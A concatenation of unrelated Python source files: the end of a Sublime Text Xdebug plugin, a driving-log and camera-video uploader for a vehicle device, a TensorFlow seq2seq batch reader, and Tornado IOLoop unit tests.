panel = window.get_output_panel('xdebug')
panel.run_command("xdebug_view_update")
# Close output panel
window.run_command('hide_panel', {"panel": 'output.xdebug'})
def is_enabled(self, restore=False, close_windows=False):
disable_layout = config.get_value(S.KEY_DISABLE_LAYOUT)
if close_windows and (not disable_layout or not V.has_debug_view()):
return False
if restore and disable_layout:
return False
return True
def is_visible(self, restore=False, close_windows=False):
if S.SESSION:
return False
disable_layout = config.get_value(S.KEY_DISABLE_LAYOUT)
if close_windows and (not disable_layout or not V.has_debug_view()):
return False
if restore and disable_layout:
return False
if restore:
try:
return sublime.active_window().get_layout() == config.get_value(S.KEY_DEBUG_LAYOUT, S.LAYOUT_DEBUG)
except:
pass
return True
class XdebugSettingsCommand(sublime_plugin.WindowCommand):
"""
Show settings file.
"""
def run(self, default=True):
# Show default settings in package when available
if default and S.PACKAGE_FOLDER is not None:
package = S.PACKAGE_FOLDER
# Otherwise show User defined settings
else:
package = "User"
# Strip .sublime-package of package name for syntax file
package_extension = ".sublime-package"
if package.endswith(package_extension):
package = package[:-len(package_extension)]
# Open settings file
self.window.run_command('open_file', {'file': '${packages}/' + package + '/' + S.FILE_PACKAGE_SETTINGS });
|
uploader.py
|
#!/usr/bin/env python
import os
import re
import time
import stat
import json
import random
import ctypes
import inspect
import requests
import traceback
import threading
import subprocess
from collections import Counter
from selfdrive.swaglog import cloudlog
from selfdrive.loggerd.config import ROOT
from common.params import Params
from common.api import api_get
fake_upload = os.getenv("FAKEUPLOAD") is not None
def raise_on_thread(t, exctype):
for ctid, tobj in threading._active.items():
if tobj is t:
tid = ctid
break
else:
raise Exception("Could not find thread")
'''Raises an exception in the threads with id tid'''
if not inspect.isclass(exctype):
raise TypeError("Only types can be raised (not instances)")
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(tid),
ctypes.py_object(exctype))
if res == 0:
raise ValueError("invalid thread id")
elif res != 1:
# "if it returns a number greater than one, you're in trouble,
# and you should call it again with exc=NULL to revert the effect"
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, 0)
raise SystemError("PyThreadState_SetAsyncExc failed")
def listdir_with_creation_date(d):
lst = os.listdir(d)
for fn in lst:
try:
st = os.stat(os.path.join(d, fn))
ctime = st[stat.ST_CTIME]
yield (ctime, fn)
except OSError:
cloudlog.exception("listdir_with_creation_date: stat failed?")
yield (None, fn)
def listdir_by_creation_date(d):
times_and_paths = list(listdir_with_creation_date(d))
return [path for _, path in sorted(times_and_paths)]
def clear_locks(root):
for logname in os.listdir(root):
path = os.path.join(root, logname)
try:
for fname in os.listdir(path):
if fname.endswith(".lock"):
os.unlink(os.path.join(path, fname))
except OSError:
cloudlog.exception("clear_locks failed")
def is_on_wifi():
# ConnectivityManager.getActiveNetworkInfo()
try:
result = subprocess.check_output(["service", "call", "connectivity", "2"]).strip().split("\n")
except subprocess.CalledProcessError:
return False
data = ''.join(''.join(w.decode("hex")[::-1] for w in l[14:49].split()) for l in result[1:])
is_wifi = "\x00".join("WIFI") in data
is_iphone = "\x00".join("iPhone") in data
return is_wifi and not is_iphone
def is_on_hotspot():
try:
result = subprocess.check_output(["ifconfig", "wlan0"])
result = re.findall(r"inet addr:((\d+\.){3}\d+)", result)[0][0]
is_android = result.startswith('192.168.43.')
is_ios = result.startswith('172.20.10.')
return (is_android or is_ios)
except:
return False
class Uploader(object):
def __init__(self, dongle_id, access_token, root):
self.dongle_id = dongle_id
self.access_token = access_token
self.root = root
self.upload_thread = None
self.last_resp = None
self.last_exc = None
def clean_dirs(self):
try:
for logname in os.listdir(self.root):
path = os.path.join(self.root, logname)
# remove empty directories
if not os.listdir(path):
os.rmdir(path)
except OSError:
cloudlog.exception("clean_dirs failed")
def gen_upload_files(self):
if not os.path.isdir(self.root):
return
for logname in listdir_by_creation_date(self.root):
path = os.path.join(self.root, logname)
names = os.listdir(path)
if any(name.endswith(".lock") for name in names):
continue
for name in names:
key = os.path.join(logname, name)
fn = os.path.join(path, name)
yield (name, key, fn)
def get_data_stats(self):
name_counts = Counter()
total_size = 0
for name, key, fn in self.gen_upload_files():
name_counts[name] += 1
total_size += os.stat(fn).st_size
return dict(name_counts), total_size
def next_file_to_compress(self):
for name, key, fn in self.gen_upload_files():
if name.endswith("log"):
return (key, fn, 0)
return None
def next_file_to_upload(self, with_video):
# try to upload log files first
for name, key, fn in self.gen_upload_files():
if name == "rlog.bz2":
return (key, fn, 0)
if with_video:
# then upload compressed rear and front camera files
for name, key, fn in self.gen_upload_files():
if name == "fcamera.hevc":
return (key, fn, 1)
elif name == "dcamera.hevc":
return (key, fn, 2)
# then upload other files
for name, key, fn in self.gen_upload_files():
if not name.endswith('.lock') and not name.endswith(".tmp"):
return (key, fn, 3)
return None
def do_upload(self, key, fn):
try:
url_resp = api_get("v1.2/"+self.dongle_id+"/upload_url/", timeout=2, path=key, access_token=self.access_token)
url_resp_json = json.loads(url_resp.text)
url = url_resp_json['url']
headers = url_resp_json['headers']
cloudlog.info("upload_url v1.2 %s %s", url, str(headers))
if fake_upload:
cloudlog.info("*** WARNING, THIS IS A FAKE UPLOAD TO %s ***" % url)
class FakeResponse(object):
def __init__(self):
self.status_code = 200
self.last_resp = FakeResponse()
else:
with open(fn, "rb") as f:
self.last_resp = requests.put(url, data=f, headers=headers, timeout=10)
except Exception as e:
self.last_exc = (e, traceback.format_exc())
raise
def normal_upload(self, key, fn):
self.last_resp = None
self.last_exc = None
try:
self.do_upload(key, fn)
except Exception:
pass
return self.last_resp
def killable_upload(self, key, fn):
self.last_resp = None
self.last_exc = None
self.upload_thread = threading.Thread(target=lambda: self.do_upload(key, fn))
self.upload_thread.start()
self.upload_thread.join()
self.upload_thread = None
return self.last_resp
def abort_upload(self):
thread = self.upload_thread
if thread is None:
return
if not thread.is_alive():
return
raise_on_thread(thread, SystemExit)
thread.join()
def compress(self, key, fn):
# write out the bz2 compress
if fn.endswith("log"):
ext = ".bz2"
cloudlog.info("compressing %r to %r", fn, fn+ext)
if os.system("nice -n 19 bzip2 -c %s > %s.tmp && mv %s.tmp %s%s && rm %s" % (fn, fn, fn, fn, ext, fn)) != 0:
cloudlog.exception("upload: bzip2 compression failed")
return False
# assuming file is named properly
key += ext
fn += ext
return (key, fn)
def upload(self, key, fn):
try:
sz = os.path.getsize(fn)
except OSError:
cloudlog.exception("upload: getsize failed")
return False
cloudlog.event("upload", key=key, fn=fn, sz=sz)
cloudlog.info("checking %r with size %r", key, sz)
if sz == 0:
# can't upload files of 0 size
os.unlink(fn) # delete the file
success = True
else:
cloudlog.info("uploading %r", fn)
# stat = self.killable_upload(key, fn)
stat = self.normal_upload(key, fn)
if stat is not None and stat.status_code in (200, 201):
cloudlog.event("upload_success", key=key, fn=fn, sz=sz)
os.unlink(fn) # delete the file
success = True
else:
cloudlog.event("upload_failed", stat=stat, exc=self.last_exc, key=key, fn=fn, sz=sz)
success = False
self.clean_dirs()
return success
def uploader_fn(exit_event):
cloudlog.info("uploader_fn")
params = Params()
dongle_id, access_token = params.get("DongleId"), params.get("AccessToken")
if dongle_id is None or access_token is None:
cloudlog.info("uploader MISSING DONGLE_ID or ACCESS_TOKEN")
raise Exception("uploader can't start without dongle id and access token")
uploader = Uploader(dongle_id, access_token, ROOT)
backoff = 0.1
while True:
allow_cellular = (params.get("IsUploadVideoOverCellularEnabled") != "0")
on_hotspot = is_on_hotspot()
on_wifi = is_on_wifi()
should_upload = allow_cellular or (on_wifi and not on_hotspot)
if exit_event.is_set():
return
d = uploader.next_file_to_compress()
if d is not None:
key, fn, _ = d
uploader.compress(key, fn)
continue
if not should_upload:
time.sleep(5)
continue
d = uploader.next_file_to_upload(with_video=True)
if d is None:
time.sleep(5)
continue
key, fn, _ = d
cloudlog.event("uploader_netcheck", allow_cellular=allow_cellular, is_on_hotspot=on_hotspot, is_on_wifi=on_wifi)
cloudlog.info("to upload %r", d)
success = uploader.upload(key, fn)
if success:
backoff = 0.1
else:
cloudlog.info("backoff %r", backoff)
time.sleep(backoff + random.uniform(0, backoff))
backoff = min(backoff*2, 120)
cloudlog.info("upload done, success=%r", success)
def main(gctx=None):
uploader_fn(threading.Event())
if __name__ == "__main__":
main()
|
batch_reader.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Batch reader to seq2seq attention model, with bucketing support."""
from collections import namedtuple
from random import shuffle
from threading import Thread
import time
import numpy as np
import six
from six.moves import queue as Queue
from six.moves import xrange
import tensorflow as tf
import data
ModelInput = namedtuple('ModelInput',
'enc_input dec_input target enc_len dec_len '
'origin_article origin_abstract')
BUCKET_CACHE_BATCH = 100
QUEUE_NUM_BATCH = 100
class Batcher(object):
"""Batch reader with shuffling and bucketing support."""
def __init__(self, data_path, vocab, hps,
article_key, abstract_key, max_article_sentences,
max_abstract_sentences, bucketing=True, truncate_input=False):
"""Batcher constructor.
Args:
data_path: tf.Example filepattern.
vocab: Vocabulary.
hps: Seq2SeqAttention model hyperparameters.
article_key: article feature key in tf.Example.
abstract_key: abstract feature key in tf.Example.
max_article_sentences: Max number of sentences used from article.
max_abstract_sentences: Max number of sentences used from abstract.
bucketing: Whether bucket articles of similar length into the same batch.
truncate_input: Whether to truncate input that is too long. Alternative is
to discard such examples.
"""
self._data_path = data_path
self._vocab = vocab
self._hps = hps
self._article_key = article_key
self._abstract_key = abstract_key
self._max_article_sentences = max_article_sentences
self._max_abstract_sentences = max_abstract_sentences
self._bucketing = bucketing
self._truncate_input = truncate_input
self._input_queue = Queue.Queue(QUEUE_NUM_BATCH * self._hps.batch_size)
self._bucket_input_queue = Queue.Queue(QUEUE_NUM_BATCH)
self._input_threads = []
for _ in xrange(16):
self._input_threads.append(Thread(target=self._FillInputQueue))
self._input_threads[-1].daemon = True
self._input_threads[-1].start()
self._bucketing_threads = []
for _ in xrange(4):
self._bucketing_threads.append(Thread(target=self._FillBucketInputQueue))
self._bucketing_threads[-1].daemon = True
self._bucketing_threads[-1].start()
self._watch_thread = Thread(target=self._WatchThreads)
self._watch_thread.daemon = True
self._watch_thread.start()
def NextBatch(self):
"""Returns a batch of inputs for seq2seq attention model.
Returns:
enc_batch: A batch of encoder inputs [batch_size, hps.enc_timestamps].
dec_batch: A batch of decoder inputs [batch_size, hps.dec_timestamps].
target_batch: A batch of targets [batch_size, hps.dec_timestamps].
enc_input_len: encoder input lengths of the batch.
dec_input_len: decoder input lengths of the batch.
loss_weights: weights for loss function, 1 if not padded, 0 if padded.
origin_articles: original article words.
origin_abstracts: original abstract words.
"""
enc_batch = np.zeros(
(self._hps.batch_size, self._hps.enc_timesteps), dtype=np.int32)
enc_input_lens = np.zeros(
(self._hps.batch_size), dtype=np.int32)
dec_batch = np.zeros(
(self._hps.batch_size, self._hps.dec_timesteps), dtype=np.int32)
dec_output_lens = np.zeros(
(self._hps.batch_size), dtype=np.int32)
target_batch = np.zeros(
(self._hps.batch_size, self._hps.dec_timesteps), dtype=np.int32)
loss_weights = np.zeros(
(self._hps.batch_size, self._hps.dec_timesteps), dtype=np.float32)
origin_articles = ['None'] * self._hps.batch_size
origin_abstracts = ['None'] * self._hps.batch_size
buckets = self._bucket_input_queue.get()
for i in xrange(self._hps.batch_size):
(enc_inputs, dec_inputs, targets, enc_input_len, dec_output_len,
article, abstract) = buckets[i]
origin_articles[i] = article
origin_abstracts[i] = abstract
enc_input_lens[i] = enc_input_len
dec_output_lens[i] = dec_output_len
enc_batch[i, :] = enc_inputs[:]
dec_batch[i, :] = dec_inputs[:]
target_batch[i, :] = targets[:]
for j in xrange(dec_output_len):
loss_weights[i][j] = 1
return (enc_batch, dec_batch, target_batch, enc_input_lens, dec_output_lens,
loss_weights, origin_articles, origin_abstracts)
def _FillInputQueue(self):
"""Fill input queue with ModelInput."""
start_id = self._vocab.WordToId(data.SENTENCE_START)
end_id = self._vocab.WordToId(data.SENTENCE_END)
pad_id = self._vocab.WordToId(data.PAD_TOKEN)
input_gen = self._TextGenerator(data.ExampleGen(self._data_path))
while True:
(article, abstract) = six.next(input_gen)
article_sentences = [sent.strip() for sent in
data.ToSentences(article, include_token=False)]
abstract_sentences = [sent.strip() for sent in
data.ToSentences(abstract, include_token=False)]
enc_inputs = []
# Use the <s> as the <GO> symbol for decoder inputs.
dec_inputs = [start_id]
# Convert first N sentences to word IDs, stripping existing <s> and </s>.
for i in xrange(min(self._max_article_sentences,
len(article_sentences))):
enc_inputs += data.GetWordIds(article_sentences[i], self._vocab)
for i in xrange(min(self._max_abstract_sentences,
len(abstract_sentences))):
dec_inputs += data.GetWordIds(abstract_sentences[i], self._vocab)
# Filter out too-short input
if (len(enc_inputs) < self._hps.min_input_len or
len(dec_inputs) < self._hps.min_input_len):
tf.logging.warning('Drop an example - too short.\nenc:%d\ndec:%d',
len(enc_inputs), len(dec_inputs))
continue
# If we're not truncating input, throw out too-long input
if not self._truncate_input:
if (len(enc_inputs) > self._hps.enc_timesteps or
len(dec_inputs) > self._hps.dec_timesteps):
tf.logging.warning('Drop an example - too long.\nenc:%d\ndec:%d',
len(enc_inputs), len(dec_inputs))
continue
# If we are truncating input, do so if necessary
else:
if len(enc_inputs) > self._hps.enc_timesteps:
enc_inputs = enc_inputs[:self._hps.enc_timesteps]
if len(dec_inputs) > self._hps.dec_timesteps:
dec_inputs = dec_inputs[:self._hps.dec_timesteps]
# targets is dec_inputs without <s> at beginning, plus </s> at end
targets = dec_inputs[1:]
targets.append(end_id)
# Now len(enc_inputs) should be <= enc_timesteps, and
# len(targets) = len(dec_inputs) should be <= dec_timesteps
enc_input_len = len(enc_inputs)
dec_output_len = len(targets)
# Pad if necessary
while len(enc_inputs) < self._hps.enc_timesteps:
enc_inputs.append(pad_id)
while len(dec_inputs) < self._hps.dec_timesteps:
dec_inputs.append(end_id)
while len(targets) < self._hps.dec_timesteps:
targets.append(end_id)
element = ModelInput(enc_inputs, dec_inputs, targets, enc_input_len,
dec_output_len, ' '.join(article_sentences),
' '.join(abstract_sentences))
self._input_queue.put(element)
def _FillBucketInputQueue(self):
"""Fill bucketed batches into the bucket_input_queue."""
while True:
inputs = []
for _ in xrange(self._hps.batch_size * BUCKET_CACHE_BATCH):
inputs.append(self._input_queue.get())
if self._bucketing:
inputs = sorted(inputs, key=lambda inp: inp.enc_len)
batches = []
for i in xrange(0, len(inputs), self._hps.batch_size):
batches.append(inputs[i:i + self._hps.batch_size])
shuffle(batches)
for b in batches:
self._bucket_input_queue.put(b)
def _WatchThreads(self):
"""Watch the daemon input threads and restart if dead."""
while True:
time.sleep(60)
input_threads = []
for t in self._input_threads:
if t.is_alive():
input_threads.append(t)
else:
tf.logging.error('Found input thread dead.')
new_t = Thread(target=self._FillInputQueue)
input_threads.append(new_t)
input_threads[-1].daemon = True
input_threads[-1].start()
self._input_threads = input_threads
bucketing_threads = []
for t in self._bucketing_threads:
if t.is_alive():
bucketing_threads.append(t)
else:
tf.logging.error('Found bucketing thread dead.')
new_t = Thread(target=self._FillBucketInputQueue)
bucketing_threads.append(new_t)
bucketing_threads[-1].daemon = True
bucketing_threads[-1].start()
self._bucketing_threads = bucketing_threads
def _TextGenerator(self, example_gen):
"""Generates article and abstract text from tf.Example."""
while True:
e = six.next(example_gen)
try:
article_text = self._GetExFeatureText(e, self._article_key)
abstract_text = self._GetExFeatureText(e, self._abstract_key)
except ValueError:
tf.logging.error('Failed to get article or abstract from example')
continue
yield (article_text, abstract_text)
def _GetExFeatureText(self, ex, key):
"""Extract text for a feature from td.Example.
Args:
ex: tf.Example.
key: key of the feature to be extracted.
Returns:
feature: a feature text extracted.
"""
return ex.features.feature[key].bytes_list.value[0]
|
ioloop_test.py
|
#!/usr/bin/env python
from __future__ import absolute_import, division, print_function, with_statement
import contextlib
import datetime
import functools
import socket
import sys
import threading
import time
import types
from tornado import gen
from tornado.ioloop import IOLoop, TimeoutError, PollIOLoop, PeriodicCallback
from tornado.log import app_log
from tornado.platform.select import _Select
from tornado.stack_context import ExceptionStackContext, StackContext, wrap, NullContext
from tornado.testing import AsyncTestCase, bind_unused_port, ExpectLog
from tornado.test.util import unittest, skipIfNonUnix, skipOnTravis, skipBefore35, exec_test
try:
from concurrent import futures
except ImportError:
futures = None
class FakeTimeSelect(_Select):
def __init__(self):
self._time = 1000
super(FakeTimeSelect, self).__init__()
def time(self):
return self._time
def sleep(self, t):
self._time += t
def poll(self, timeout):
events = super(FakeTimeSelect, self).poll(0)
if events:
return events
self._time += timeout
return []
class FakeTimeIOLoop(PollIOLoop):
"""IOLoop implementation with a fake and deterministic clock.
The clock advances as needed to trigger timeouts immediately.
For use when testing code that involves the passage of time
and no external dependencies.
"""
def initialize(self):
self.fts = FakeTimeSelect()
super(FakeTimeIOLoop, self).initialize(impl=self.fts,
time_func=self.fts.time)
def sleep(self, t):
"""Simulate a blocking sleep by advancing the clock."""
self.fts.sleep(t)
class TestIOLoop(AsyncTestCase):
def test_add_callback_return_sequence(self):
# A callback returning {} or [] shouldn't spin the CPU, see Issue #1803.
self.calls = 0
loop = self.io_loop
test = self
old_add_callback = loop.add_callback
def add_callback(self, callback, *args, **kwargs):
test.calls += 1
old_add_callback(callback, *args, **kwargs)
loop.add_callback = types.MethodType(add_callback, loop)
loop.add_callback(lambda: {})
loop.add_callback(lambda: [])
loop.add_timeout(datetime.timedelta(milliseconds=50), loop.stop)
loop.start()
self.assertLess(self.calls, 10)
@skipOnTravis
def test_add_callback_wakeup(self):
# Make sure that add_callback from inside a running IOLoop
# wakes up the IOLoop immediately instead of waiting for a timeout.
def callback():
self.called = True
self.stop()
def schedule_callback():
self.called = False
self.io_loop.add_callback(callback)
# Store away the time so we can check if we woke up immediately
self.start_time = time.time()
self.io_loop.add_timeout(self.io_loop.time(), schedule_callback)
self.wait()
self.assertAlmostEqual(time.time(), self.start_time, places=2)
self.assertTrue(self.called)
@skipOnTravis
def test_add_callback_wakeup_other_thread(self):
def target():
# sleep a bit to let the ioloop go into its poll loop
time.sleep(0.01)
self.stop_time = time.time()
self.io_loop.add_callback(self.stop)
thread = threading.Thread(target=target)
self.io_loop.add_callback(thread.start)
self.wait()
delta = time.time() - self.stop_time
self.assertLess(delta, 0.1)
thread.join()
def test_add_timeout_timedelta(self):
self.io_loop.add_timeout(datetime.timedelta(microseconds=1), self.stop)
self.wait()
def test_multiple_add(self):
sock, port = bind_unused_port()
try:
self.io_loop.add_handler(sock.fileno(), lambda fd, events: None,
IOLoop.READ)
# Attempting to add the same handler twice fails
# (with a platform-dependent exception)
self.assertRaises(Exception, self.io_loop.add_handler,
sock.fileno(), lambda fd, events: None,
IOLoop.READ)
finally:
self.io_loop.remove_handler(sock.fileno())
sock.close()
def test_remove_without_add(self):
# remove_handler should not throw an exception if called on an fd
# was never added.
sock, port = bind_unused_port()
try:
self.io_loop.remove_handler(sock.fileno())
finally:
sock.close()
def test_add_callback_from_signal(self):
# cheat a little bit and just run this normally, since we can't
# easily simulate the races that happen with real signal handlers
self.io_loop.add_callback_from_signal(self.stop)
self.wait()
def test_add_callback_from_signal_other_thread(self):
# Very crude test, just to make sure that we cover this case.
# This also happens to be the first test where we run an IOLoop in
# a non-main thread.
other_ioloop = IOLoop()
thread = threading.Thread(target=other_ioloop.start)
thread.start()
other_ioloop.add_callback_from_signal(other_ioloop.stop)
thread.join()
other_ioloop.close()
def test_add_callback_while_closing(self):
# Issue #635: add_callback() should raise a clean exception
# if called while another thread is closing the IOLoop.
if IOLoop.configured_class().__name__.endswith('AsyncIOLoop'):
raise unittest.SkipTest("AsyncIOMainLoop shutdown not thread safe")
closing = threading.Event()
def target():
other_ioloop.add_callback(other_ioloop.stop)
other_ioloop.start()
closing.set()
other_ioloop.close(all_fds=True)
other_ioloop = IOLoop()
thread = threading.Thread(target=target)
thread.start()
closing.wait()
for i in range(1000):
try:
other_ioloop.add_callback(lambda: None)
except RuntimeError as e:
self.assertEqual("IOLoop is closing", str(e))
break
def test_handle_callback_exception(self):
# IOLoop.handle_callback_exception can be overridden to catch
# exceptions in callbacks.
def handle_callback_exception(callback):
self.assertIs(sys.exc_info()[0], ZeroDivisionError)
self.stop()
self.io_loop.handle_callback_exception = handle_callback_exception
with NullContext():
# remove the test StackContext that would see this uncaught
# exception as a test failure.
self.io_loop.add_callback(lambda: 1 / 0)
self.wait()
@skipIfNonUnix # just because socketpair is so convenient
def test_read_while_writeable(self):
# Ensure that write events don't come in while we're waiting for
# a read and haven't asked for writeability. (the reverse is
# difficult to test for)
client, server = socket.socketpair()
try:
def handler(fd, events):
self.assertEqual(events, IOLoop.READ)
self.stop()
self.io_loop.add_handler(client.fileno(), handler, IOLoop.READ)
self.io_loop.add_timeout(self.io_loop.time() + 0.01,
functools.partial(server.send, b'asdf'))
self.wait()
self.io_loop.remove_handler(client.fileno())
finally:
client.close()
server.close()
def test_remove_timeout_after_fire(self):
# It is not an error to call remove_timeout after it has run.
handle = self.io_loop.add_timeout(self.io_loop.time(), self.stop)
self.wait()
self.io_loop.remove_timeout(handle)
def test_remove_timeout_cleanup(self):
# Add and remove enough callbacks to trigger cleanup.
# Not a very thorough test, but it ensures that the cleanup code
# gets executed and doesn't blow up. This test is only really useful
# on PollIOLoop subclasses, but it should run silently on any
# implementation.
for i in range(2000):
timeout = self.io_loop.add_timeout(self.io_loop.time() + 3600,
lambda: None)
self.io_loop.remove_timeout(timeout)
# HACK: wait two IOLoop iterations for the GC to happen.
self.io_loop.add_callback(lambda: self.io_loop.add_callback(self.stop))
self.wait()
def test_remove_timeout_from_timeout(self):
calls = [False, False]
# Schedule several callbacks and wait for them all to come due at once.
# t2 should be cancelled by t1, even though it is already scheduled to
# be run before the ioloop even looks at it.
now = self.io_loop.time()
def t1():
calls[0] = True
self.io_loop.remove_timeout(t2_handle)
self.io_loop.add_timeout(now + 0.01, t1)
def t2():
calls[1] = True
t2_handle = self.io_loop.add_timeout(now + 0.02, t2)
self.io_loop.add_timeout(now + 0.03, self.stop)
time.sleep(0.03)
self.wait()
self.assertEqual(calls, [True, False])
def test_timeout_with_arguments(self):
# This tests that all the timeout methods pass through *args correctly.
results = []
self.io_loop.add_timeout(self.io_loop.time(), results.append, 1)
self.io_loop.add_timeout(datetime.timedelta(seconds=0),
results.append, 2)
self.io_loop.call_at(self.io_loop.time(), results.append, 3)
self.io_loop.call_later(0, results.append, 4)
self.io_loop.call_later(0, self.stop)
self.wait()
self.assertEqual(results, [1, 2, 3, 4])
def test_add_timeout_return(self):
# All the timeout methods return non-None handles that can be
# passed to remove_timeout.
handle = self.io_loop.add_timeout(self.io_loop.time(), lambda: None)
self.assertFalse(handle is None)
self.io_loop.remove_timeout(handle)
def test_call_at_return(self):
handle = self.io_loop.call_at(self.io_loop.time(), lambda: None)
self.assertFalse(handle is None)
self.io_loop.remove_timeout(handle)
def test_call_later_return(self):
handle = self.io_loop.call_later(0, lambda: None)
self.assertFalse(handle is None)
self.io_loop.remove_timeout(handle)
def test_close_file_object(self):
"""When a file object is used instead of a numeric file descriptor,
the object should be closed (by IOLoop.close(all_fds=True),
not just the fd.
"""
# Use a socket since they are supported by IOLoop on all platforms.
# Unfortunately, sockets don't support the .closed attribute for
# inspecting their close status, so we must use a wrapper.
class SocketWrapper(object):
def __init__(self, sockobj):
self.sockobj = sockobj
self.closed = False
def fileno(self):
return self.sockobj.fileno()
def close(self):
self.closed = True
self.sockobj.close()
sockobj, port = bind_unused_port()
socket_wrapper = SocketWrapper(sockobj)
io_loop = IOLoop()
io_loop.add_handler(socket_wrapper, lambda fd, events: None,
IOLoop.READ)
io_loop.close(all_fds=True)
self.assertTrue(socket_wrapper.closed)
def test_handler_callback_file_object(self):
"""The handler callback receives the same fd object it passed in."""
server_sock, port = bind_unused_port()
fds = []
def handle_connection(fd, events):
fds.append(fd)
conn, addr = server_sock.accept()
conn.close()
self.stop()
self.io_loop.add_handler(server_sock, handle_connection, IOLoop.READ)
with contextlib.closing(socket.socket()) as client_sock:
client_sock.connect(('127.0.0.1', port))
self.wait()
self.io_loop.remove_handler(server_sock)
self.io_loop.add_handler(server_sock.fileno(), handle_connection,
IOLoop.READ)
with contextlib.closing(socket.socket()) as client_sock:
client_sock.connect(('127.0.0.1', port))
self.wait()
self.assertIs(fds[0], server_sock)
self.assertEqual(fds[1], server_sock.fileno())
self.io_loop.remove_handler(server_sock.fileno())
server_sock.close()
def test_mixed_fd_fileobj(self):
server_sock, port = bind_unused_port()
def f(fd, events):
pass
self.io_loop.add_handler(server_sock, f, IOLoop.READ)
with self.assertRaises(Exception):
# The exact error is unspecified - some implementations use
# IOError, others use ValueError.
self.io_loop.add_handler(server_sock.fileno(), f, IOLoop.READ)
self.io_loop.remove_handler(server_sock.fileno())
server_sock.close()
def test_reentrant(self):
"""Calling start() twice should raise an error, not deadlock."""
returned_from_start = [False]
got_exception = [False]
def callback():
try:
self.io_loop.start()
returned_from_start[0] = True
except Exception:
got_exception[0] = True
self.stop()
self.io_loop.add_callback(callback)
self.wait()
self.assertTrue(got_exception[0])
self.assertFalse(returned_from_start[0])
def test_exception_logging(self):
"""Uncaught exceptions get logged by the IOLoop."""
# Use a NullContext to keep the exception from being caught by
# AsyncTestCase.
with NullContext():
self.io_loop.add_callback(lambda: 1 / 0)
self.io_loop.add_callback(self.stop)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
def test_exception_logging_future(self):
"""The IOLoop examines exceptions from Futures and logs them."""
with NullContext():
@gen.coroutine
def callback():
self.io_loop.add_callback(self.stop)
1 / 0
self.io_loop.add_callback(callback)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
@skipBefore35
def test_exception_logging_native_coro(self):
"""The IOLoop examines exceptions from awaitables and logs them."""
namespace = exec_test(globals(), locals(), """
async def callback():
self.io_loop.add_callback(self.stop)
1 / 0
""")
with NullContext():
self.io_loop.add_callback(namespace["callback"])
with ExpectLog(app_log, "Exception in callback"):
self.wait()
def test_spawn_callback(self):
# An added callback runs in the test's stack_context, so will be
# re-arised in wait().
self.io_loop.add_callback(lambda: 1 / 0)
with self.assertRaises(ZeroDivisionError):
self.wait()
# A spawned callback is run directly on the IOLoop, so it will be
# logged without stopping the test.
self.io_loop.spawn_callback(lambda: 1 / 0)
self.io_loop.add_callback(self.stop)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
@skipIfNonUnix
def test_remove_handler_from_handler(self):
# Create two sockets with simultaneous read events.
client, server = socket.socketpair()
try:
client.send(b'abc')
server.send(b'abc')
# After reading from one fd, remove the other from the IOLoop.
chunks = []
def handle_read(fd, events):
chunks.append(fd.recv(1024))
if fd is client:
self.io_loop.remove_handler(server)
else:
self.io_loop.remove_handler(client)
self.io_loop.add_handler(client, handle_read, self.io_loop.READ)
self.io_loop.add_handler(server, handle_read, self.io_loop.READ)
self.io_loop.call_later(0.1, self.stop)
self.wait()
# Only one fd was read; the other was cleanly removed.
self.assertEqual(chunks, [b'abc'])
finally:
client.close()
server.close()
# Deliberately not a subclass of AsyncTestCase so the IOLoop isn't
# automatically set as current.
class TestIOLoopCurrent(unittest.TestCase):
def setUp(self):
self.io_loop = None
IOLoop.clear_current()
def tearDown(self):
if self.io_loop is not None:
self.io_loop.close()
def test_default_current(self):
self.io_loop = IOLoop()
# The first IOLoop with default arguments is made current.
self.assertIs(self.io_loop, IOLoop.current())
# A second IOLoop can be created but is not made current.
io_loop2 = IOLoop()
self.assertIs(self.io_loop, IOLoop.current())
io_loop2.close()
def test_non_current(self):
self.io_loop = IOLoop(make_current=False)
# The new IOLoop is not initially made current.
self.assertIsNone(IOLoop.current(instance=False))
# Starting the IOLoop makes it current, and stopping the loop
# makes it non-current. This process is repeatable.
for i in range(3):
def f():
self.current_io_loop = IOLoop.current()
self.io_loop.stop()
self.io_loop.add_callback(f)
self.io_loop.start()
self.assertIs(self.current_io_loop, self.io_loop)
# Now that the loop is stopped, it is no longer current.
self.assertIsNone(IOLoop.current(instance=False))
def test_force_current(self):
self.io_loop = IOLoop(make_current=True)
self.assertIs(self.io_loop, IOLoop.current())
with self.assertRaises(RuntimeError):
# A second make_current=True construction cannot succeed.
IOLoop(make_current=True)
# current() was not affected by the failed construction.
self.assertIs(self.io_loop, IOLoop.current())
class TestIOLoopAddCallback(AsyncTestCase):
def setUp(self):
super(TestIOLoopAddCallback, self).setUp()
self.active_contexts = []
def add_callback(self, callback, *args, **kwargs):
self.io_loop.add_callback(callback, *args, **kwargs)
@contextlib.contextmanager
def context(self, name):
self.active_contexts.append(name)
yield
self.assertEqual(self.active_contexts.pop(), name)
def test_pre_wrap(self):
# A pre-wrapped callback is run in the context in which it was
# wrapped, not when it was added to the IOLoop.
def f1():
self.assertIn('c1', self.active_contexts)
self.assertNotIn('c2', self.active_contexts)
self.stop()
with StackContext(functools.partial(self.context, 'c1')):
wrapped = wrap(f1)
with StackContext(functools.partial(self.context, 'c2')):
self.add_callback(wrapped)
self.wait()
def test_pre_wrap_with_args(self):
# Same as test_pre_wrap, but the function takes arguments.
# Implementation note: The function must not be wrapped in a
# functools.partial until after it has been passed through
# stack_context.wrap
def f1(foo, bar):
self.assertIn('c1', self.active_contexts)
self.assertNotIn('c2', self.active_contexts)
self.stop((foo, bar))
with StackContext(functools.partial(self.context, 'c1')):
wrapped = wrap(f1)
with StackContext(functools.partial(self.context, 'c2')):
self.add_callback(wrapped, 1, bar=2)
result = self.wait()
self.assertEqual(result, (1, 2))
